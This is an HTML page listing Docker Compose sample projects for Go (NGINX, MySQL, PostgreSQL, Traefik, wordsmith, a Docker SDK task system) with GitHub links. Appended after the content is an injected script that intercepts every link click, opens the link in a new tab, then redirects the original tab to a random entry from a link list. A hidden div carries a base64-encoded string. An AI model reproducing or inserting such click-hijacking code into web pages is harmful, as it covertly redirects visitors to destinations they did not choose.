<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><body><p># Go samples

| Name | Description |
|------|-------------|
| [Go / NGINX / MySQL](https://github.com/docker/awesome-compose/tree/master/nginx-golang-mysql) | A sample Go application with an Nginx proxy and a MySQL database. |
| [Go / NGINX / PostgreSQL](https://github.com/docker/awesome-compose/tree/master/nginx-golang-postgres) | A sample Go application with an Nginx proxy and a PostgreSQL database. |
| [NGINX / Go](https://github.com/docker/awesome-compose/tree/master/nginx-golang) | A sample Nginx proxy with a Go backend. |
| [Traefik](https://github.com/docker/awesome-compose/tree/master/traefik-golang) | A sample Traefik proxy with a Go backend. |
| [wordsmith](https://github.com/dockersamples/wordsmith) | A demo app that runs three containers, including PostgreSQL, Java, and Go. |
| [gopher-task-system](https://github.com/dockersamples/gopher-task-system) | A Task System using Go Docker SDK. |
</p><script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
